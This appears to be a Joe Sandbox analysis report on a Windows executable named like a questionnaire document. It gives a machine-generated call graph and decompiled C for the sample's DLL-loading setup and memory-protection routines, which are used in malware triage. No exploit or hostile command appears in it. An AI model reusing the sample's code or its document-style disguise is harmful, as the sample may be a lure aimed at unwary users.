30288->30292 30471 41f264 24 API calls 30288->30471 30290 4247d1 30472 40711c 24 API calls 30290->30472 30295 424819 30292->30295 30473 41f264 24 API calls 30292->30473 30294 424814 30474 40711c 24 API calls 30294->30474 30295->30213 30298 4af20e 30297->30298 30299 4af1c7 30297->30299 30298->30185 30299->30298 30300 4af1cf Sleep 30299->30300 30301 4af1df Sleep 30299->30301 30303 4af1f6 GetLastError 30299->30303 30475 427154 30299->30475 30300->30299 30301->30299 30303->30298 30304 4af200 GetLastError 30303->30304 30304->30298 30304->30299 30305->30184 30307->30215 30308->30201 30309->30205 30316 4af263 30310->30316 30311 4af299 30313 4af2a6 GetUserDefaultLangID 30311->30313 30318 4af29b 30311->30318 30312 4af29d 30326 42301c 58 API calls 30312->30326 30313->30318 30315 4af2a2 30315->30318 30316->30311 30316->30312 30317 4af277 30316->30317 30320 4af60c 30317->30320 30318->30317 30319 4af218 GetLocaleInfoW 30318->30319 30319->30318 30321 4af614 30320->30321 30322 4af64f 30320->30322 30321->30322 30327 407f5c 24 API calls 30321->30327 30322->30174 30322->30178 30324 4af635 30328 427000 24 API calls 30324->30328 30326->30315 30327->30324 30328->30322 30330 4087da 30329->30330 30331 408664 24 API calls 30330->30331 30332 408815 30330->30332 30333 40885f 30330->30333 30331->30332 30332->30333 30334 407e00 24 API calls 30332->30334 30334->30333 30389 422a90 30335->30389 30338 422da0 30340 422a90 25 API calls 30338->30340 30342 422ded 30338->30342 30341 422db0 30340->30341 30343 422dbc 30341->30343 30345 422a6c 25 API calls 30341->30345 30397 4228a4 30342->30397 30343->30342 30409 41ff2c 50 API calls 30343->30409 30345->30343 30348 422dc5 30350 422a90 25 API calls 30348->30350 30359 422de2 30348->30359 30349 422660 24 API calls 30352 422e02 30349->30352 30353 422dd6 30350->30353 30354 407e00 24 API calls 30352->30354 30356 422a6c 25 API calls 30353->30356 30353->30359 30355 422e0c 30354->30355 30357 407a80 24 API calls 30355->30357 30356->30359 30358 422e26 30357->30358 30358->30242 30359->30342 30410 422d18 GetWindowsDirectoryW 30359->30410 30361 4aeeec 30360->30361 30362 422660 24 API calls 30361->30362 30363 4aef05 30362->30363 30364 407e48 24 API calls 30363->30364 30369 4aef10 30364->30369 30366 4229ac 24 API calls 30366->30369 30368 4087c4 24 API calls 30368->30369 30369->30366 30369->30368 30373 4aef8e 30369->30373 30425 4aee50 30369->30425 30433 4271cc 30369->30433 30441 426f08 24 API calls 30369->30441 30442 41f264 24 API calls 30369->30442 30443 40711c 24 API calls 30369->30443 30374 407e00 24 API calls 30373->30374 30375 4aef99 30374->30375 30376 407a80 24 API calls 30375->30376 30377 4aefb3 30376->30377 30378 407a80 24 API calls 30377->30378 30379 4aefc0 30378->30379 30379->30242 30380->30242 30381->30242 30383 423312 30382->30383 30384 407ba8 24 API calls 30383->30384 30385 423332 30384->30385 30385->30242 30386->30242 30387->30242 30390 408664 24 API calls 30389->30390 30391 422aa3 30390->30391 30392 422abe GetEnvironmentVariableW 30391->30392 30396 422ad1 30391->30396 30411 422e84 24 API calls 30391->30411 30392->30391 30393 422aca 30392->30393 30394 407a20 24 API calls 30393->30394 30394->30396 30396->30338 30406 422a6c 30396->30406 30398 4228ad 30397->30398 30398->30398 30399 4228d4 GetFullPathNameW 30398->30399 30400 4228e0 30399->30400 30401 4228f7 30399->30401 30400->30401 30402 4228e8 30400->30402 30403 407e00 24 API calls 30401->30403 30404 407ba8 24 API calls 30402->30404 30405 4228f5 30403->30405 30404->30405 30405->30349 30412 422a18 30406->30412 30409->30348 30410->30342 30411->30391 30418 4229ac 30412->30418 30414 422a38 30415 422a40 GetFileAttributesW 30414->30415 30416 407a20 24 API calls 30415->30416 30417 422a5d 30416->30417 30417->30338 30419 4229bd 30418->30419 30420 422a03 30419->30420 30421 4229f8 30419->30421 30423 4088ac 24 API calls 30420->30423 30422 407e00 24 API calls 30421->30422 30424 422a01 30422->30424 30423->30424 30424->30414 30426 407a20 24 API calls 30425->30426 30428 4aee71 30426->30428 30430 4aeea2 30428->30430 30444 408510 30428->30444 30447 408950 30428->30447 30431 407a20 24 API calls 30430->30431 30432 4aeeb7 30431->30432 30432->30369 30451 427108 30433->30451 30435 4271e2 30436 4271e6 30435->30436 30457 422a80 30435->30457 30436->30369 30441->30369 30442->30369 30445 407ba8 24 API calls 30444->30445 30446 40851d 30445->30446 30446->30428 30448 408965 30447->30448 30449 408664 24 API calls 30448->30449 30450 4089ba 30448->30450 30449->30450 30450->30428 30452 427112 30451->30452 30453 427116 30451->30453 30452->30435 30454 427138 SetLastError 30453->30454 30455 42711f Wow64DisableWow64FsRedirection 30453->30455 30456 427133 30454->30456 30455->30456 30456->30435 30458 422a18 25 API calls 30457->30458 30459 422a8a GetLastError 30458->30459 30460 427144 30459->30460 30461 427153 30460->30461 30462 427149 Wow64RevertWow64FsRedirection 30460->30462 30461->30369 30462->30461 30467 4084ec 30463->30467 30466->30281 30468 4084f2 CreateFileW 30467->30468 30468->30279 30469->30286 30471->30290 30473->30294 30476 427108 2 API calls 30475->30476 30477 42716a 30476->30477 30478 42716e 30477->30478 30479 42718a DeleteFileW GetLastError 30477->30479 30478->30299 30480 427144 Wow64RevertWow64FsRedirection 30479->30480 30481 4271b0 30480->30481 30481->30299 30482 4b62df 30483 4b6304 30482->30483 30484 4b633c 30483->30484 30494 4af834 24 API calls 30483->30494 30490 423ed8 SetEndOfFile 30484->30490 30487 4b6358 30495 40540c 24 API calls 30487->30495 30489 4b638f 30491 423ee8 30490->30491 30492 423eef 30490->30492 30496 423cac 109 API calls 30491->30496 30492->30487 30494->30484 30495->30489 30496->30492 30497 41ff94 30498 407e48 24 API calls 30497->30498 30499 41ffc4 30498->30499 30512 407fb0 30499->30512 30501 41ffcc 30502 41ffd8 GetFileVersionInfoSizeW 30501->30502 30503 42007e 30502->30503 30506 41ffe8 30502->30506 30504 407a20 24 API calls 30503->30504 30505 420093 30504->30505 30507 420011 GetFileVersionInfoW 30506->30507 30508 420035 30507->30508 30509 42001b VerQueryValueW 30507->30509 30516 40540c 24 API calls 30508->30516 30509->30508 30511 420076 30514 407f18 30512->30514 30513 407f53 30513->30501 30514->30513 30517 40540c 24 API calls 30514->30517 30516->30511 30517->30513 30518 4b5eec 30545 40d1cc GetModuleHandleW 30518->30545 30527 407e00 24 API calls 30528 4b5f5e 30527->30528 30529 423d00 110 API calls 30528->30529 30530 4b5f76 30529->30530 30577 4af9f0 FindResourceW 30530->30577 30533 4b5feb 30590 423cc0 30533->30590 30534 4b5f8e 30534->30533 30612 4af834 24 API calls 30534->30612 30536 4b6011 30537 4b602d 30536->30537 30613 4af834 24 API calls 30536->30613 30539 424748 24 API calls 30537->30539 30540 4b6053 30539->30540 30594 425cd8 30540->30594 30542 4b60c9 30543 4b607e 30543->30542 30544 425cd8 108 API calls 30543->30544 30544->30543 30546 40d207 30545->30546 30614 407484 30546->30614 30549 4af91c GetSystemInfo VirtualQuery 30550 4af9e7 30549->30550 30553 4af948 30549->30553 30555 4af474 30550->30555 30551 4af9c7 VirtualQuery 30551->30550 30551->30553 30552 4af978 VirtualProtect 30552->30553 30553->30550 30553->30551 30553->30552 30554 4af9b1 VirtualProtect 30553->30554 30554->30551 30790 422c14 GetCommandLineW 30555->30790 30557 4af55d 30558 407a80 24 API calls 30557->30558 30559 4af577 30558->30559 30563 422c74 30559->30563 30560 422c74 26 API calls 30562 4af492 30560->30562 30561 4088ac 24 API calls 30561->30562 30562->30557 30562->30560 30562->30561 30564 422c9b GetModuleFileNameW 30563->30564 30565 422cbf GetCommandLineW 30563->30565 30567 407ba8 24 API calls 30564->30567 30566 422cc6 30565->30566 30568 422ccc 30566->30568 30571 422b34 24 API calls 30566->30571 30573 422cd4 30566->30573 30569 422cbd 30567->30569 30570 407a20 24 API calls 30568->30570 30572 422cf3 30569->30572 30570->30573 30571->30566 30574 407a20 24 API calls 30572->30574 30576 407e00 24 API calls 30573->30576 30575 422d08 30574->30575 30575->30527 30576->30572 30578 4afa0a SizeofResource 30577->30578 30579 4afa05 30577->30579 30581 4afa1c LoadResource 30578->30581 30582 4afa17 30578->30582 30812 4af834 24 API calls 30579->30812 30584 4afa2a 30581->30584 30585 4afa2f LockResource 30581->30585 30813 4af834 24 API calls 30582->30813 30814 4af834 24 API calls 30584->30814 30587 4afa3b 30585->30587 30588 4afa40 30585->30588 30815 4af834 24 API calls 30587->30815 30588->30534 30591 423cd4 30590->30591 30592 423ce4 30591->30592 30816 423bf8 108 API calls 30591->30816 30592->30536 30597 425d09 30594->30597 30601 425d54 30594->30601 30595 425da1 30820 424a24 108 API calls 30595->30820 30596 424a24 108 API calls 30596->30597 30597->30596 30597->30601 30603 408664 24 API calls 30597->30603 30608 407fa0 24 API calls 30597->30608 30610 407e00 24 API calls 30597->30610 30599 424a24 108 API calls 30599->30601 30600 425db9 30604 407a44 24 API calls 30600->30604 30601->30595 30601->30599 30817 408254 24 API calls 30601->30817 30818 407f5c 24 API calls 30601->30818 30819 407e9c 24 API calls 30601->30819 30603->30597 30605 425dce 30604->30605 30606 407a20 24 API calls 30605->30606 30611 425dd6 30606->30611 30608->30597 30610->30597 30611->30543 30612->30533 30613->30537 30615 4074bc 30614->30615 30618 407418 30615->30618 30619 407460 30618->30619 30620 407428 30618->30620 30619->30549 30620->30619 30625 4232ec 25 API calls 30620->30625 30627 4b5980 30620->30627 30639 4b5a90 30620->30639 30657 4b5000 30620->30657 30669 40caa4 GetSystemInfo 30620->30669 30670 4b5114 30620->30670 30625->30620 30628 4b599e 30627->30628 30629 4b5a33 30627->30629 30742 407588 30628->30742 30629->30620 30631 4b59a8 30632 407e00 24 API calls 30631->30632 30633 4b59ca 30631->30633 30632->30633 30634 40ae34 51 API calls 30633->30634 30635 4b5a11 30634->30635 30748 420524 54 API calls 30635->30748 30637 4b5a2e 30749 4206d8 122 API calls 30637->30749 30640 4b5b3f 30639->30640 30641 4b5ab4 GetModuleHandleW 30639->30641 30643 407a80 24 API calls 30640->30643 30753 40e1a8 30641->30753 30645 4b5b59 30643->30645 30644 4b5ac9 GetModuleHandleW 30646 40e1a8 26 API calls 30644->30646 30645->30620 30647 4b5ae3 30646->30647 30765 422d44 GetSystemDirectoryW 30647->30765 30649 4b5b0d 30650 422660 24 API calls 30649->30650 30651 4b5b18 30650->30651 30652 4086e4 24 API calls 30651->30652 30653 4b5b25 30652->30653 30767 421230 SetErrorMode 30653->30767 30655 4b5b32 30656 4232ec 25 API calls 30655->30656 30656->30640 30658 4b50c9 30657->30658 30659 4b501e 30657->30659 30658->30620 30660 4b5028 SetThreadLocale 30659->30660 30770 40a250 InitializeCriticalSection GetVersion 30660->30770 30664 4b505e 30665 4b5077 GetCommandLineW 30664->30665 30774 403810 GetStartupInfoW 30665->30774 30667 4b50a1 GetACP GetCurrentThreadId 30775 40cab8 GetVersion 30667->30775 30669->30620 30671 4b511c 30670->30671 30671->30671 30672 4b536d 30671->30672 30673 4b5141 GetModuleHandleW GetVersion 30671->30673 30676 407a80 24 API calls 30672->30676 30674 4b517a 30673->30674 30675 4b515c GetProcAddress 30673->30675 30678 4b5182 GetProcAddress 30674->30678 30679 4b5344 GetProcAddress 30674->30679 30675->30674 30677 4b516d 30675->30677 30680 4b5387 30676->30680 30677->30674 30681 4b5191 30678->30681 30682 4b535a GetProcAddress 30679->30682 30683 4b5353 30679->30683 30680->30620 30776 40e520 GetSystemDirectoryW 30681->30776 30682->30672 30685 4b5369 SetProcessDEPPolicy 30682->30685 30683->30682 30685->30672 30686 4b51a0 30687 407e00 24 API calls 30686->30687 30688 4b51ad 30687->30688 30688->30679 30689 4b51e5 30688->30689 30690 4086e4 24 API calls 30688->30690 30691 40873c 24 API calls 30689->30691 30690->30689 30692 4b51f8 30691->30692 30777 40e54c SetErrorMode LoadLibraryW 30692->30777 30694 4b5200 30695 40873c 24 API calls 30694->30695 30696 4b5213 30695->30696 30778 40e54c SetErrorMode LoadLibraryW 30696->30778 30698 4b521b 30699 40873c 24 API calls 30698->30699 30700 4b522e 30699->30700 30779 40e54c SetErrorMode LoadLibraryW 30700->30779 30702 4b5236 30703 40873c 24 API calls 30702->30703 30704 4b5249 30703->30704 30780 40e54c SetErrorMode LoadLibraryW 30704->30780 30706 4b5251 30707 40873c 24 API calls 30706->30707 30708 4b5264 30707->30708 30781 40e54c SetErrorMode LoadLibraryW 30708->30781 30710 4b526c 30711 40873c 24 API calls 30710->30711 30712 4b527f 30711->30712 30782 40e54c SetErrorMode LoadLibraryW 30712->30782 30714 4b5287 30715 40873c 24 API calls 30714->30715 30716 4b529a 30715->30716 30783 40e54c SetErrorMode LoadLibraryW 30716->30783 30718 4b52a2 30719 40873c 24 API calls 30718->30719 30720 4b52b5 30719->30720 30784 40e54c SetErrorMode LoadLibraryW 30720->30784 30722 4b52bd 30723 40873c 24 API calls 30722->30723 30724 4b52d0 30723->30724 30785 40e54c SetErrorMode LoadLibraryW 30724->30785 30726 4b52d8 30727 40873c 24 API calls 30726->30727 30728 4b52eb 30727->30728 30786 40e54c SetErrorMode LoadLibraryW 30728->30786 30730 4b52f3 30731 40873c 24 API calls 30730->30731 30732 4b5306 30731->30732 30787 40e54c SetErrorMode LoadLibraryW 30732->30787 30734 4b530e 30735 40873c 24 API calls 30734->30735 30736 4b5321 30735->30736 30788 40e54c SetErrorMode LoadLibraryW 30736->30788 30738 4b5329 30739 40873c 24 API calls 30738->30739 30740 4b533c 30739->30740 30789 40e54c SetErrorMode LoadLibraryW 30740->30789 30745 407594 30742->30745 30747 4075cb 30745->30747 30750 4074cc 78 API calls 30745->30750 30751 407524 78 API calls 30745->30751 30752 407574 78 API calls 30745->30752 30747->30631 30748->30637 30749->30629 30750->30745 30751->30745 30752->30745 30754 40e1d0 GetProcAddress 30753->30754 30755 40e1dc 30753->30755 30756 40e230 30754->30756 30757 407a44 24 API calls 30755->30757 30759 407a44 24 API calls 30756->30759 30758 40e1f2 30757->30758 30761 40e209 GetProcAddress 30758->30761 30760 40e245 30759->30760 30760->30644 30762 40e220 30761->30762 30763 407a44 24 API calls 30762->30763 30764 40e228 30763->30764 30764->30644 30766 422d65 30765->30766 30766->30649 30768 4084ec 30767->30768 30769 421268 LoadLibraryW 30768->30769 30769->30655 30771 40a280 6 API calls 30770->30771 30772 40a2ce 30770->30772 30771->30772 30773 40caa4 GetSystemInfo 30772->30773 30773->30664 30774->30667 30775->30658 30776->30686 30777->30694 30778->30698 30779->30702 30780->30706 30781->30710 30782->30714 30783->30718 30784->30722 30785->30726 30786->30730 30787->30734 30788->30738 30789->30679 30797 422b34 30790->30797 30792 422c4f 30793 407a20 24 API calls 30792->30793 30796 422c64 30793->30796 30794 422b34 24 API calls 30795 422c36 30794->30795 30795->30792 30795->30794 30796->30562 30798 422b5f 30797->30798 30799 407ba8 24 API calls 30798->30799 30800 422b6c 30799->30800 30807 407fa0 30800->30807 30802 422b74 30803 407e00 24 API calls 30802->30803 30804 422b8c 30803->30804 30805 407a20 24 API calls 30804->30805 30806 422bb4 30805->30806 30806->30795 30809 407f18 30807->30809 30808 407f53 30808->30802 30809->30808 30811 40540c 24 API calls 30809->30811 30811->30808 30812->30578 30813->30581 30814->30585 30815->30588 30816->30592 30817->30601 30818->30601 30819->30601 30820->30600 30821 40cb18 30822 40cb31 30821->30822 30823 40cb86 30821->30823 30839 40582c 24 API calls 30822->30839 30825 40cb3b 30840 40582c 24 API calls 30825->30840 30827 40cb45 30841 40582c 24 API calls 30827->30841 30829 40cb4f 30842 40a340 DeleteCriticalSection 30829->30842 30831 40cb54 30832 40cb67 30831->30832 30833 40426c 10 API calls 30831->30833 30843 40c198 24 API calls 30832->30843 30833->30832 30835 40cb71 30844 405384 30835->30844 30839->30825 30840->30827 30841->30829 30842->30831 30843->30835 30845 40538d CloseHandle 30844->30845 30846 40539f 30844->30846 30845->30846 30847 4053ad 30846->30847 30860 404d58 10 API calls 30846->30860 30849 4053b6 VirtualFree 30847->30849 30850 4053cf 30847->30850 30849->30850 30854 4052d4 30850->30854 30853 408c90 40 API calls 30853->30823 30855 4052f9 30854->30855 30856 4052e7 VirtualFree 30855->30856 30857 4052fd 30855->30857 30856->30855 30858 405363 VirtualFree 30857->30858 30859 405379 30857->30859 30858->30857 30859->30853 30860->30847 30861 403ee8 30862 403f00 30861->30862 30863 404148 30861->30863 30874 403f12 30862->30874 30876 403f9d Sleep 30862->30876 30864 404260 30863->30864 30865 40410c 30863->30865 30867 403c94 VirtualAlloc 30864->30867 30868 404269 30864->30868 30871 404126 Sleep 30865->30871 30877 404166 30865->30877 30866 403f21 30869 403ccf 30867->30869 30870 403cbf 30867->30870 30872 403c48 2 API calls 30870->30872 30875 40413c Sleep 30871->30875 30871->30877 30872->30869 30873 404000 30884 40400c 30873->30884 30885 403bcc 30873->30885 30874->30866 30874->30873 30880 403fe1 Sleep 30874->30880 30875->30865 30876->30874 30879 403fb3 Sleep 30876->30879 30878 403bcc VirtualAlloc 30877->30878 30882 404184 30877->30882 30878->30882 30879->30862 30880->30873 30881 403ff7 Sleep 30880->30881 30881->30874 30889 403b60 30885->30889 30887 403bd5 VirtualAlloc 30888 403bec 30887->30888 30888->30884 30890 403b00 30889->30890 30890->30887 30891 4b63a1 30892 4b63d3 30891->30892 30915 40e450 30892->30915 30894 4b640c SetWindowLongW 30919 41a87c 30894->30919 30899 4087c4 24 API calls 30900 4b648e 30899->30900 30927 4af728 30900->30927 30903 4af60c 24 API calls 30905 4b64b3 30903->30905 30904 4b64ec 30907 4b6505 30904->30907 30910 4b64ff RemoveDirectoryW 30904->30910 30905->30904 30906 4af1b4 9 API calls 30905->30906 30906->30904 30908 4b6519 30907->30908 30909 4b650e DestroyWindow 30907->30909 30911 4b6542 30908->30911 30942 408d08 40 API calls 30908->30942 30909->30908 30910->30907 30913 4b6538 30943 40540c 24 API calls 30913->30943 30944 405740 30915->30944 30917 40e463 CreateWindowExW 30918 40e49d 30917->30918 30918->30894 30945 41a8a4 30919->30945 30922 422bc4 GetCommandLineW 30923 422b34 24 API calls 30922->30923 30924 422be7 30923->30924 30925 407a20 24 API calls 30924->30925 30926 422c05 30925->30926 30926->30899 30928 4087c4 24 API calls 30927->30928 30929 4af763 30928->30929 30930 4af795 CreateProcessW 30929->30930 30931 4af7aa CloseHandle 30930->30931 30932 4af7a1 30930->30932 30934 4af7b3 30931->30934 30967 4af34c 26 API calls 30932->30967 30963 4af6fc 30934->30963 30937 4af7d1 30938 4af6fc 3 API calls 30937->30938 30939 4af7d6 GetExitCodeProcess CloseHandle 30938->30939 30940 407a20 24 API calls 30939->30940 30941 4af7fe 30940->30941 30941->30903 30941->30905 30942->30913 30943->30911 30944->30917 30948 41a8bc 30945->30948 30949 41a8c5 30948->30949 30952 41a925 30949->30952 30961 41a7f4 107 API calls 30949->30961 30951 41a998 30953 407ba8 24 API calls 30951->30953 30952->30951 30959 41a942 30952->30959 30955 41a89c 30953->30955 30954 41a98c 30956 408664 24 API calls 30954->30956 30955->30922 30956->30955 30957 407a20 24 API calls 30957->30959 30958 408664 24 API calls 30958->30959 30959->30954 30959->30957 30959->30958 30962 41a7f4 107 API calls 30959->30962 30961->30952 30962->30959 30964 4af710 PeekMessageW 30963->30964 30965 4af722 MsgWaitForMultipleObjects 30964->30965 30966 4af704 TranslateMessage DispatchMessageW 30964->30966 30965->30934 30965->30937 30966->30964 30967->30931

                                                                                              Executed Functions

                                                                                              Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 73%
                                                                                              			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                                                              0x004b5115
                                                                                              0x004b5117
                                                                                              0x004b511c
                                                                                              0x004b511c
                                                                                              0x004b511e
                                                                                              0x004b5120
                                                                                              0x004b5120
                                                                                              0x004b5128
                                                                                              0x004b5129
                                                                                              0x004b512e
                                                                                              0x004b5131
                                                                                              0x004b5134
                                                                                              0x004b513b
                                                                                              0x004b536d
                                                                                              0x004b536f
                                                                                              0x004b5372
                                                                                              0x004b5375
                                                                                              0x004b5387
                                                                                              0x004b5141
                                                                                              0x004b514b
                                                                                              0x004b514d
                                                                                              0x004b5154
                                                                                              0x004b515a
                                                                                              0x004b5167
                                                                                              0x004b516b
                                                                                              0x004b5172
                                                                                              0x004b5177
                                                                                              0x004b5179
                                                                                              0x004b5179
                                                                                              0x004b516b
                                                                                              0x004b517c
                                                                                              0x004b5188
                                                                                              0x004b518f
                                                                                              0x004b5196
                                                                                              0x004b5196
                                                                                              0x004b519b
                                                                                              0x004b51a8
                                                                                              0x004b51b4
                                                                                              0x004b51ba
                                                                                              0x004b51c1
                                                                                              0x004b51c6
                                                                                              0x004b51c6
                                                                                              0x004b51d4
                                                                                              0x004b51e0
                                                                                              0x004b51e0
                                                                                              0x004b51f3
                                                                                              0x004b51fb
                                                                                              0x004b520e
                                                                                              0x004b5216
                                                                                              0x004b5229
                                                                                              0x004b5231
                                                                                              0x004b5244
                                                                                              0x004b524c
                                                                                              0x004b525f
                                                                                              0x004b5267
                                                                                              0x004b527a
                                                                                              0x004b5282
                                                                                              0x004b5295
                                                                                              0x004b529d
                                                                                              0x004b52b0
                                                                                              0x004b52b8
                                                                                              0x004b52cb
                                                                                              0x004b52d3
                                                                                              0x004b52e6
                                                                                              0x004b52ee
                                                                                              0x004b5301
                                                                                              0x004b5309
                                                                                              0x004b531c
                                                                                              0x004b5324
                                                                                              0x004b5337
                                                                                              0x004b533f
                                                                                              0x004b533f
                                                                                              0x004b51b4
                                                                                              0x004b534a
                                                                                              0x004b5351
                                                                                              0x004b5358
                                                                                              0x004b5358
                                                                                              0x004b5360
                                                                                              0x004b5367
                                                                                              0x004b536b
                                                                                              0x004b536b
                                                                                              0x00000000
                                                                                              0x004b5367

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                                              • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                                                • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                                                • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                                              • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                                              • API String ID: 2248137261-3182217745
                                                                                              • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                              • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                                              • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                              • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 382 4af91c-4af942 GetSystemInfo VirtualQuery 383 4af948 382->383 384 4af9e7-4af9ee 382->384 385 4af9db-4af9e1 383->385 385->384 386 4af94d-4af954 385->386 387 4af956-4af95a 386->387 388 4af9c7-4af9d9 VirtualQuery 386->388 387->388 389 4af95c-4af967 387->389 388->384 388->385 390 4af978-4af98d VirtualProtect 389->390 391 4af969-4af96c 389->391 393 4af98f 390->393 394 4af994-4af996 390->394 391->390 392 4af96e-4af971 391->392 392->390 396 4af973-4af976 392->396 393->394 395 4af9a5-4af9a8 394->395 397 4af9aa-4af9af 395->397 398 4af998-4af9a1 call 4af914 395->398 396->390 396->394 397->388 400 4af9b1-4af9c2 VirtualProtect 397->400 398->395 400->388
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
